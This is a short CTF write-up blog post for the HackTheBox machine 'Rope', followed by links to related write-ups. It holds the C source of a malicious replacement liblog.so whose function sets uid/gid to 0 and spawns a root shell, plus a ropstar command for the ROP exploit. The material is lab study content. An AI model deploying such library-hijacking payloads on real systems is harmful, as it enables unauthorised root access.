Rope @ HackTheBox

23May

Rope @ HackTheBox

By CTF , , ,

Rope is a 50-point machine on HackTheBox that involves 3 binary exploits. There is a format string vulnerability in the boxes’s webserver and a replaceable shared library used by a binary we can run with sudo. Finally there is another binary where we have to bypass a stack canary and use ROP.

Notes

The user exploit.

Liblog.so:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

void printlog(){
    setuid(0);
    setgid(0);
    system("/bin/sh",NULL,NULL);
}

The root exploit.

Solving with ropstar:

python3 ~/tools/ropstar/ropstar.py -rhost localhost -rport 1337 -remote_offset ./contact

Thanks r4j for creating this fun box!

Share this post

Author

Related Posts

11Apr

Traverxec @ HackTheBox

Traverxec is a 20-point machine on hackthebox that involves using a public exploit on the nostromo webserver, cracking the passphrase... read more

06Jun

Nest @ HackTheBox

Nest is a 20-point Windows machine on HackTheBox that involves searching through smb shares and analyzing 2 short custom programs. read more

27Feb

Academy @ HackTheBox

Solving Academy on HackTheBox, a 20-point Linux machine on HackTheBox that involves a Laravel deserialization RCE, stored credentials & sudo... read more

10Jun

Protected: Rastalabs Prolab @ HackTheBox

There is no excerpt because this is a protected post. read more

15May

Ghoul @ HackTheBox

Ghoul is a nice 40 points machine on hackthebox involving zip traversal, lateral movement, public exploits and some obscure hidden... read more

08Jan

Real World CTF 2023 – NonHeavyFTP

This is a short writeup on the "NonHeavyFTP" challenge from Real World CTF 2023. This was one of the easier... read more

18Apr

Mango @ HackTheBox

Mango is a 30-point linux machine on hackthebox that involves a NoSQL-Injection which allows to obtain user passwords from a... read more

18May

Ellingson @ HackTheBox

Ellingson is fun and quick 40 points machine on hackthebox, featuring the abuse of the python/flask werkzeug debugger, cracking a... read more

14Mar

Postman @ HackTheBox

Postman is a 20-point machine on hackthebox, that involves using redis to write an ssh key to disk, cracking the... read more

03Aug

Fortune @ HackTheBox

Fortune is a 50 point machine on hackthebox.eu featuring OpenBSD. I was lucky enough to get first blood on this... read more